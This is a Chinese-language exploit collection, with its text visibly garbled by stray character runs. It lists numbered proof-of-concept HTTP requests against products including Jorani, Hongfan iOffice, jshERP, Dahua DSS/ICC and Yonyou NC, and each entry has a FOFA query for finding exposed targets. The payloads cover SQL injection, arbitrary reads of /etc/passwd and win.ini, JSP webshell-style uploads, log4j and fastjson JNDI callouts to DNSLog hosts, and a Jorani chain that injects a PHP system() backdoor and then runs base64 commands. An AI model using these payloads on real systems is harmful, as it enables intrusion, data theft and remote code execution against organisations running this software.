GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1' c3 A1 z) D: H7 g9 \
Host: 127.0.0.1
, ~3 J2 h8 J. R' j [5 y& y& {Pragma: no-cache
- b. ?$ j8 [7 y- {; WCache-Control: no-cache
% U2 D. J7 ^# h( G3 @, w& H+ HUpgrade-Insecure-Requests: 1
1 ]: F, I9 ]2 ^ b, oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ V- |/ ?& D3 Z6 b* N2 t; m+ S* p, f8 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* j( M- _+ Z3 b6 x$ Y
Accept-Encoding: gzip, deflate
) X# z' t4 c$ O& f& L9 x8 S8 ^/ iAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 Y. D$ }" ~# g# F& m5 A# ]Connection: close3 t" `" L. ^3 g( F
# t J) V* r+ U! x( o3 L" U' N2 ]* L# p, c, c& A5 Z" r1 V5 X
12. Jorani < 1.0.2 远程命令执行0 d$ j$ O$ C% K: H* z7 c& g8 d
FOFA:title="Jorani"" @2 _0 Y0 R O j6 M. V; J
第一步先拿到cookie9 K% d$ t5 |8 O1 I/ U) S
GET /session/login HTTP/1.1& I' N: d! w: u2 |6 E0 y' c
Host: 192.168.190.30# S1 M2 Y( F, C- w F* N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 d( ~2 g1 A* n0 ?9 m
Connection: close
+ I2 b, n. T# G# L4 [& n8 f- D1 _+ GAccept-Encoding: gzip
( b! K# o* j6 m7 w
% n! @$ a- l9 x, I8 t3 }7 {3 ]5 b. f* u. O
响应中csrf_cookie_jorani用于后续请求- @0 h T$ K0 P/ h+ _
HTTP/1.1 200 OK9 z3 | R4 x' w
Connection: close3 B! z- y7 n5 |% U( h
Cache-Control: no-store, no-cache, must-revalidate. T+ O. ^- n4 z6 ]
Content-Type: text/html; charset=UTF-8
& u' ^( `1 r' |& RDate: Tue, 24 Oct 2023 09:34:28 GMT
+ ]; d9 Y3 p. zExpires: Thu, 19 Nov 1981 08:52:00 GMT) [! g+ ]% v/ _) i, k! i# w
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
; D5 \) D1 E8 `6 xPragma: no-cache
% m& `/ P* d9 y2 DServer: Apache/2.4.54 (Debian)' J; J: a/ R b$ p; l
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/3 m" r9 z" X: `* n) s
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly3 W" O. r1 B( c) a1 @
Vary: Accept-Encoding" |0 S: u+ b! x0 n% d! O. a
) o1 N9 e8 b0 @$ o: F6 D% A$ _
' F3 ^8 E1 o7 Y O2 zPOST请求,执行函数并进行base64编码 r/ t4 O4 Q2 R
POST /session/login HTTP/1.1
3 e n( c3 n7 _' e% j, iHost: 192.168.190.303 |! @ O% t% ]8 N' |7 e+ d* l% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 @! u* m0 y6 C% B1 K5 z$ EConnection: close. x0 v2 W8 u3 n/ Y+ l1 B: v* i7 a
Content-Length: 252! q4 K( V- p3 {" p: q5 v. m% M
Content-Type: application/x-www-form-urlencoded* B3 f5 c; I/ I& {- Y2 _1 m6 s
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r" v, N* D# s* Z" d
Accept-Encoding: gzip
# C8 M7 ^0 U) H: ?4 Z2 n2 g
8 B8 a2 N1 H& U* Jcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
& P: c9 F) C e# ^7 L0 B6 r6 w5 A. Z) e
0 F2 E0 E: A5 I+ `) Y
5 h* K! p# g& a R向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
( T- k. _) Q* v- A9 q0 KGET /pages/view/log-2023-10-24 HTTP/1.1
" r& q, F* h `+ c ]Host: 192.168.190.30
0 B; D9 Y& p" p( DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 E& D+ j8 B0 D6 k# i, [
Connection: close
! o, K' n) h p0 u8 MCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
+ E: e9 S& o+ h( ^: u6 [K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
- n- Q! A/ |' J9 `7 HX-REQUESTED-WITH: XMLHttpRequest
8 a! B$ j* D. m, y% d9 ~, DAccept-Encoding: gzip& c0 U# n2 D0 v' }9 {) w
3 K+ }- _; ]. [, H1 i1 d- ~5 s, s. G/ H! p; e2 V. T4 [! e
13. 红帆iOffice ioFileDown任意文件读取
2 i4 Y2 P& l1 Y$ N0 mFOFA:app="红帆-ioffice"" r, m, }7 ]- d3 |4 z! ^1 I9 s/ j' {6 b
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
- _. g$ U9 d! G& F/ R9 Z, l, BHost: x.x.x.x
/ _2 F( K" _, F$ _7 A. L1 D# lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 q- X1 Z" a+ i( {) ~Connection: close* b8 e0 X- _6 w. D# j3 I
Accept: */*
0 R" ^, @. ^- \+ O3 C2 O; MAccept-Encoding: gzip
" m0 e. j n/ m( ^4 u
( I% o& m8 e1 j* L# K
8 P# i( u6 E( P% q) v14. 华夏ERP(jshERP)敏感信息泄露$ p# s! I0 l$ [' C2 v
FOFA:body="jshERP-boot" Q5 _3 A; q3 g' _( _
泄露内容包括用户名密码
9 T1 A2 B3 i0 I" H, ZGET /jshERP-boot/user/getAllList;.ico HTTP/1.1( P( d z' O* w* I/ n
Host: x.x.x.x
& O" m4 k' W/ dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# F! l0 j9 ?$ O: XConnection: close9 w; E0 F9 ]- ^# ^$ e- `
Accept: */* _& A* f! Z% [
Accept-Language: en: X S: g3 R* B5 V4 m5 `% ^' C
Accept-Encoding: gzip
$ f4 H8 C: g' c9 g, l" f0 L5 J! l3 P9 w+ C1 h
# d& f7 V* x% Z k n15. 华夏ERP getAllList信息泄露
) W9 g* t8 {/ A; N, q: e# z# \: sCVE-2024-0490; z8 ~# b: a; {- C0 i/ Q$ s2 f/ ?3 F( `
FOFA:body="jshERP-boot"$ M. Q w; N5 B; ~3 }# H6 x) D
泄露内容包括用户名密码 ^& i2 c; U6 j0 W( ]
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1) _. C% p4 ~" V2 E. k
Host: 192.168.40.130:100
* U' S1 T" n4 `. GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# w# T2 k* X5 l; A/ xConnection: close
5 M# o4 k6 Y8 A4 ~# @& lAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) G" u6 t' F2 Q0 Q; O
Accept-Language: en
4 K1 S) R: K8 ]9 J+ |' P# v6 Wsec-ch-ua-platform: Windows% Y2 ^8 s- y" G, A4 q: d8 ]0 s
Accept-Encoding: gzip' v: F: u! m, S6 s
( }2 k) ]" R: M1 `
! x* r) z6 t8 ~/ ?* \/ s2 X
16. 红帆HFOffice医微云SQL注入
8 U9 R: t N' M% y- DFOFA:title="HFOffice"
% y0 ?' Z1 c3 Fpoc中调用函数计算1234的md5值
7 b0 L) U7 X% J; n/ cGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1$ b% Y Q. B: X) d3 g% G
Host: x.x.x.x
6 U, p' V# p. x, N. j% ~* k& V% DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36& B2 |& D# d r; W6 ]
Connection: close7 e% f- w$ W& R1 Y
Accept: */*
2 c, I$ S/ b) n& L5 IAccept-Language: en
& d1 w1 X" N; B4 t2 `' S) v) z* UAccept-Encoding: gzip! {8 F) l1 @" w0 N& d7 L9 J
: W9 Q( M; D6 P" g
0 I. g2 u! b& ^17. 大华 DSS itcBulletin SQL 注入
: D2 ^6 U+ U) {) H2 Z1 CFOFA:app="dahua-DSS"
9 m4 [# S: P' h/ OPOST /portal/services/itcBulletin?wsdl HTTP/1.1% B7 t. ^- ?4 N3 K% s5 `9 L, ^
Host: x.x.x.x. [; w6 g z/ j# X9 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& R6 H; c5 j9 {6 \5 w( R( q* \
Connection: close0 l7 [* k7 X. ^) f4 V
Content-Length: 345
9 M2 a( u7 y# P5 OAccept-Encoding: gzip
8 C E" i0 \! \" j) I' t/ `; {0 Q" H
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 `( }6 @- x9 a: a0 r<s11:Body>
& J/ F8 T& \. \3 g9 u$ x J. O+ n <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
& n5 S; `0 i6 j8 |0 j/ p7 U <netMarkings>
/ j* n8 J s. C! v7 p" M* U1 c (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=10 d" U% _8 E1 R, l! N3 r
</netMarkings>
" M$ o3 ]# ` [' M2 P </ns1:deleteBulletin>
2 b/ c, P4 ~& y" J ] </s11:Body># o3 [: p H8 s: q# p
</s11:Envelope>
' _3 e1 _. G7 Y- r4 r: c `6 ]7 |& o \7 g
2 S1 O1 k3 H! t2 @0 ?( r18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- N; A$ o! b9 g9 wFOFA:app="dahua-DSS". ^# t1 {+ C+ H$ [, w' E3 J; c1 R4 Q3 J
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
. |* B& j, i. u3 e- DHost: your-ip
$ r( W5 M/ p/ o; xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( @) f3 d0 u5 b. N8 a
Accept-Encoding: gzip, deflate3 v* G" i1 j7 f+ ?
Accept: */*) e3 ^; q5 h7 w) O2 d
Connection: keep-alive
8 u4 g5 `! X8 ^- |
. v1 G9 C: y6 I) ?" Z1 I/ U. \8 Y5 ]2 A
2 w" Y. z3 m) ^) d @1 v
$ C% `0 ]6 m0 E$ u19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 _) F1 K% y% K. a$ I0 R* D
FOFA:app="dahua-DSS"! e& C; V$ W: B+ z/ d
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.17 H8 N! u! U3 V" p7 N9 ~ G2 H
Host:$ }! w8 Q% I0 S( { f! I7 S3 c
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 z& p3 j# \, h0 W9 T; a
Accept-Encoding: gzip, deflate
6 s' g! B2 J' x gAccept: */*
& G# ?1 I' r- d* ^# ?) I* B3 O* [- s" |Connection: keep-alive
; `- X& m$ N4 A. L/ t! O7 d1 t$ S; w
% l2 d' ?, k: j. X# ^3 H- O! O. j% @2 k+ Q+ Z# U7 h* h
20. 大华ICC智能物联综合管理平台任意文件读取
( V% M5 b( ]; DFOFA:body="*客户端会小于800*"
( |9 j9 p& v: K, `GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
4 _) j0 ?8 u$ G: G7 q- fHost: x.x.x.x
, H' Z. R2 n, r7 `( fUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, N' E3 ~4 k% f' H
Connection: close
+ C3 n+ b4 ?+ T% @# G5 @+ ?6 MAccept: */*0 i" }5 {0 N# g5 f
Accept-Language: en
8 h4 y [5 L, ?Accept-Encoding: gzip- C" ^$ _+ {2 Z$ ]4 E
% a/ u' E9 d# M& [, R4 L% u- S) j
5 u2 j5 E. U9 F& y+ l. Y21. 大华ICC智能物联综合管理平台random远程代码执行8 f# v: s/ I! n) L
FOFA:icon_hash="-1935899595"3 m8 e. h: Y$ c; g
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1$ p9 F1 r0 _$ @; ^
Host: x.x.x.x
# Y( v, b4 e2 X* v0 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 @: J+ a) y: M7 hContent-Length: 161
1 m* }" ~. L! h3 a7 v* wAccept-Encoding: gzip
9 }- Z# d% J' {* R$ Z1 }/ C' k9 f: N. VConnection: close
' Y' i5 I) N$ A: T7 ~" F7 hContent-Type: application/json;charset=utf-8" b" n1 Z7 U8 o2 o
) X5 M: \: ~+ A+ m) i, q) M9 Z
{
/ `% K# D+ {5 R; y8 }5 M"a":{7 S7 y/ o/ T/ {( S: _5 j/ e
"@type":"com.alibaba.fastjson.JSONObject",
) W" b" u; Y* n" e# L+ B! j {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}0 D' }" e( K. l- [, e' O
}""
4 F$ r! R u0 v# I' n}
: I2 d& [1 d1 ^3 d, C( a. L# y1 `8 v' [. p
8 _' P6 |' x% e! E% }22. 大华ICC智能物联综合管理平台 log4j远程代码执行
; l: V7 s( a4 u4 M2 PFOFA:icon_hash="-1935899595"
# B* Q5 \1 g: Y+ V' _POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
5 F# J2 W3 _* RHost: your-ip
0 l& ~; W. w3 U& ~2 T" NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
|7 w+ m5 P+ |6 ~; ^, m7 aContent-Type: application/json;charset=utf-8
, q5 ]7 s/ L0 }. X3 Y3 w1 u" {) q
# A0 b2 }+ H9 k5 x; p{
& ^9 E/ Y1 n4 [/ G# N5 B+ ^"loginName":"${jndi:ldap://dnslog}"0 | b, b+ W% p. M' @* n0 ]
}) H/ ]# Q. f9 \* x6 h3 r* F& |
; e V/ w. O2 I
& _4 ^: r5 n7 a# b1 O
# i0 X0 y. E* [* Y6 }- t4 u23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
# _; {' i& y+ J8 w! Q+ ^+ Y; r6 e' EFOFA:icon_hash="-1935899595"
9 I6 g- r; n7 a" Q# ^9 h, yPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- y2 F3 ~7 ^6 z r e
Host: your-ip4 E5 J% Y. p3 |* f" r* w* s) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( k3 H1 f: R: d8 G. }
Content-Type: application/json;charset=utf-8: K! |* ] m0 M2 M4 ~9 N: J
Accept-Encoding: gzip( z' |: K8 |, S8 }/ J
Connection: close
/ |1 @2 A; N+ v, j4 C; N4 A; F$ k3 Z. T8 O) B; l0 \
{& N- c; H! c1 Q
"a":{- x3 w/ O$ ~5 S$ A% T4 ^& g2 n2 ^/ y
"@type":"com.alibaba.fastjson.JSONObject",
; u6 H0 U2 y7 f( l' _; g1 ]* r {"@type":"java.net.URL","val":"http://DNSLOG"}
+ _" R. [$ K9 f! T& z }""
. f# O# ^: ~: u) n" o* k}
1 _$ n% e) g5 b% @- h" R
7 N) d" q) N" R4 V ^
9 r( I9 f+ l9 P+ ~; V+ ]1 j6 C; z24. 用友NC 6.5 accept.jsp任意文件上传! e, M+ {4 E( t4 x% Y5 i
FOFA:icon_hash="1085941792"
9 k# z m6 \1 Z! v; JPOST /aim/equipmap/accept.jsp HTTP/1.1, f8 @* e Y) m8 {/ B% n
Host: x.x.x.x
" o9 R2 @$ U ?+ l; FUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
# X3 e/ o+ p7 I& J, g5 X8 jConnection: close( B" ?9 n. I) K$ V
Content-Length: 4491 [# q& _* c* F; |0 C# c# ^
Accept: */*
6 P7 p: V1 L8 KAccept-Encoding: gzip
7 j5 F8 ?) S* v3 BContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc( C, `7 p" g, i$ J4 v* X
# j ?* R/ ]3 L-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
, Y# O) e" D$ j2 }Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
1 ~1 S) t9 t% f9 [0 a& W0 K) B! ^2 y) lContent-Type: text/plain
' w* x! y$ t+ s1 D* j; f, n- ]4 ^ \5 t/ q' z
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
! S. i/ L$ ?+ I* {4 `2 {$ a! ?-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ I( U3 K4 Y1 u& k
Content-Disposition: form-data; name="fname"- B1 B1 ]8 g; F6 b' B+ l" ]
- |! `, W) s; z/ ~& T7 g- l) P\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
# E& r/ m G+ S6 X7 v+ f3 |-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
6 t/ U% g9 {# O9 N4 E1 {
+ s7 e% [* T* n. {, @+ L- w4 Q" B( ~- y
25. 用友NC registerServlet JNDI 远程代码执行
$ Z& P- d& S0 F H9 [FOFA:app="用友-UFIDA-NC"
7 j4 |+ b( B4 c# A) p3 C3 ?POST /portal/registerServlet HTTP/1.1+ W4 W/ P, }8 H4 R: |" }+ x
Host: your-ip/ @. y3 r+ ?* l5 ~) j3 ]& x, B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 j, j' `6 p% l3 M1 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
0 o( W6 N! E/ g( H" r. ~Accept-Encoding: gzip, deflate/ _2 _5 j9 X- d/ h
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.61 t- @$ u+ Q. \" U5 n
Content-Type: application/x-www-form-urlencoded
8 \0 M* Y3 j$ i! \# Q3 {0 p' Y* x5 W3 `2 ?8 `4 t
type=1&dsname=ldap://dnslog
5 I+ R7 N+ p; i6 y4 D e1 |+ Q
0 u8 X2 l, u6 m9 E) G4 J' z" Y- P/ `
" N, }3 Q- @! A: L) L# W6 Y% I26. 用友NC linkVoucher SQL注入
; S& m3 c! z2 x! F2 ?8 mFOFA:app="用友-UFIDA-NC"
* g8 y, ?+ x& t [" sGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" l& l# D: u3 QHost: your-ip
, \, a3 F h2 f! f. }9 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 M6 g8 t- F3 h4 p6 l
Content-Type: application/x-www-form-urlencoded( g' r% k5 `4 u& [3 x1 L
Accept-Encoding: gzip, deflate
+ \# A- R9 H! J& d$ _Accept: */*
3 O' \; e( H- M Y4 K; lConnection: keep-alive8 O' a* ~0 a$ w3 A- |- [( v
( H& H# i7 i4 g2 ?3 u4 o
" D6 l! G8 R! b27. 用友 NC showcontent SQL注入5 C" O# N% ^8 Z7 j
FOFA:icon_hash="1085941792"
( A, O7 y" a# B% Q) Q9 pGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
7 d6 \- T& N" a' Z7 lHost: your-ip
& I( _2 T3 N9 P& _/ B |5 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, o' c! x% r1 S" n# VAccept-Encoding: identity
2 ^7 N7 m# y ~/ ^! LConnection: close$ M2 H! L: R$ U; _2 m
Content-Type: text/xml; charset=utf-8. ?9 [ P& B v: v
7 @0 E8 ^: G0 T: `% p
0 e2 [: y. T3 O s28. 用友NC grouptemplet 任意文件上传
5 _9 k9 @6 ~2 @# rFOFA:icon_hash="1085941792"! J+ G2 a$ W5 ~1 N+ d- u2 {
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
3 Q7 p6 J* H7 sHost: x.x.x.x
1 b4 l* V( Y9 C% j; ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ g; q5 |1 g2 z3 z- o: d cConnection: close6 P5 z$ P' \* _/ q" f
Content-Length: 268
# S( x8 d' C9 t( UContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* [$ F4 i) B& W6 X
Accept-Encoding: gzip
4 @6 X1 [& S+ J/ T! _" @/ j# Q6 Z. l0 Q5 Y2 e1 t' w" u
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& q# O4 H5 x' N8 `9 ]Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"% n4 l" `. V7 Q9 k! b" E8 N
Content-Type: application/octet-stream
) A u" ^; Y/ q- D7 p, k2 e( Q& A( A* C: _: Y' e
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 Y5 @, _0 O1 o" ]8 s/ X
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--* S b+ j* r; n# c) }5 {( I
- J% ]" c+ [' R4 x: P
% ^5 y% r4 W! ?; h2 w6 \" _/uapim/static/pages/nc/head.jsp2 e- }7 K5 ]) f; m9 {
$ x3 _8 m+ K R: _) p
29. 用友NC down/bill SQL注入" P1 p, o# x6 e# G- Y' Y/ L
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ C5 _: A$ m( Z* |$ Y$ NGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.11 Y" Y. ^7 K& {9 W' v
Host: your-ip2 Y% L# j n+ W& {+ m; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 a2 S8 J' ]+ t7 } y) `, [% |
Content-Type: application/x-www-form-urlencoded
0 V7 [7 c4 G- Z8 ]5 `7 GAccept-Encoding: gzip, deflate
& q9 B9 K/ p- M0 A, R6 C1 bAccept: */*) j. G! ]. v3 O% a
Connection: keep-alive
9 r- }8 T4 b+ z/ ^# S
) B8 U2 y7 O$ T% K( l' B/ N. O) ^1 E% z: p, W! K
30. 用友NC importPml SQL注入! A2 {5 O2 o: W- B
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% L5 w( ]1 l0 ?9 f
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1* [) G, M; W1 J. N
Host: your-ip* h3 t: L0 J- l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V! L3 Q9 U% j( G; z% w6 o7 W* l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! K- {4 R6 ] V w$ ]Connection: close% K: \3 i0 E$ K
0 _+ e- S% p- `- `------WebKitFormBoundaryH970hbttBhoCyj9V% _: m5 @4 U9 W+ B0 y/ a
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
9 K# |& o/ H) ~7 U$ |Content-Type: image/jpeg' ^' h$ u# h- z2 d0 g6 J
------WebKitFormBoundaryH970hbttBhoCyj9V--
! ~7 q! Y6 J1 Z/ p7 K
% M/ f; J! ] e! O$ C/ ~ v1 F7 ]7 A; |6 }% Z& S
31. 用友NC runStateServlet SQL注入 R B& P1 l! l) m
version<=6.5* u- Z6 a, w7 V" h0 e
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
2 O/ r6 ^0 W% fGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# Y/ s4 E3 B# ^/ Y. j" gHost: host
6 S1 M x H. w- F- O: Y; dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- l& g) h' _: D* G& b4 o, Q
Content-Type: application/x-www-form-urlencoded
% z: F3 r* C1 `# a5 ~% \
" y9 D1 C7 |9 N O8 i6 Y! ]6 `/ i, I; |- i+ g
32. 用友NC complainbilldetail SQL注入
/ x' ]: u8 M X z5 `; S' g Lversion= NC633、NC657 M' Q' P" D: w9 G$ z
FOFA:app="用友-UFIDA-NC"
. ?- y+ _) |5 N+ N/ M" WGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1, |8 ^$ |* K5 m8 b* b. `2 c
Host: your-ip$ @; N! J4 z* O0 v9 _& s. h! @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 Q& {* U2 e# v# C9 O
Content-Type: application/x-www-form-urlencoded/ P* X% _% `& h4 _+ N! n C
Accept-Encoding: gzip, deflate
" g; @( H' e4 b# n2 B' W2 [Accept: */* g2 V( Y5 G) c. q/ Z! E
Connection: keep-alive* T5 X0 ~) g) Y; W
/ |) W/ }" ?6 {$ C" j3 z" z
" y' F L9 S) Q1 [+ M5 |% l
33. 用友NC downTax/download SQL注入
) ^- l4 U, D$ c' l4 b7 }version:NC6.5FOFA:app="用友-UFIDA-NC"
3 Q v$ U7 r6 q4 m" A4 SGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- P! h1 B9 ^8 b, a" Q1 vHost: your-ip
, [6 D; {5 N N# a9 G" G9 e$ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% T( m" ~0 h+ {/ K+ hContent-Type: application/x-www-form-urlencoded+ c* F) u( P: |0 ^" [$ D
Accept-Encoding: gzip, deflate4 o, r! U3 w/ a4 t5 O4 m* z
Accept: */*- i4 _% h5 ^) {) q# K
Connection: keep-alive8 c$ M4 w* ?3 c9 [7 m& ^
* Z0 e0 W# K A) G, T1 v
. } |# Y( V" y( \
34. 用友NC warningDetailInfo接口SQL注入
, _. y1 l6 w9 j: Z- ^5 [6 [FOFA:app="用友-UFIDA-NC"
9 C. K9 |+ }0 s3 EGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ b; ]* M9 z4 U4 \* w
Host: your-ip, Y! `2 U, c c* u3 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 s9 C# ~0 K' t- U% d
Content-Type: application/x-www-form-urlencoded8 r# Q: b& ?' J \- T. q: T
Accept-Encoding: gzip, deflate
( v8 L3 ?3 O/ O) [5 ~# rAccept: */*
( ~: S& A, O9 nConnection: keep-alive1 l4 r4 x* u8 X& K# S; q
2 \: r5 [2 w. d1 q- l) p. _% E& D5 y! }
35. 用友NC-Cloud importhttpscer任意文件上传8 u8 o1 X' b; r3 a; g2 C
